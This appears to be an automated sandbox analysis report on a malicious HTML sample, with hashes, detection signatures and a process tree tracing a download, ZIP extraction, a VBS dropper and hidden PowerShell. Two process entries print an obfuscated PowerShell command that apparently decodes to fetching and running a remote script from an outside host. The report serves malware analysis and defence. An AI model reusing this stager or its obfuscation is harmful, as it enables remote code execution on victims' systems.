Windows
Analysis Report
CfF7MWq7aG.html
Overview
General Information

| Field | Value |
|---|---|
| Sample name | CfF7MWq7aG.html (file extension renamed from none to html, because the original name is a hash value) |
| Original sample name | 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc |
| Analysis ID | 1607145 |
| MD5 | b235a6019e401173f74c6b6487bc5c50 |
| SHA1 | 0050ea0f086beffecaee1eba84d7e8f6d907d93e |
| SHA256 | 9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc |
Detection

| Score | Range | Confidence |
|---|---|---|
| 92 | 0 - 100 | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- chrome.exe (PID: 4940, cmdline: `"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html"`, MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 4544, cmdline: `"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8`, MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- unarchiver.exe (PID: 6716, cmdline: `"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"`, MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
- 7za.exe (PID: 6744, cmdline: `"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"`, MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
- conhost.exe (PID: 6752, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6812, cmdline: `"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"`, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6820, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6884, cmdline: `"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"`, MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 7036, cmdline: `"C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"`, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7044, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7088, cmdline: `C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "`, MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 7104, cmdline: `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -`, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
No configs have been found
No yara matches
System Summary

| Source | Author |
|---|---|
| | frack113, Florian Roth |
| | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| | Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
| | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
| | frack113, Nasreddine Bencherchali (Nextron Systems) |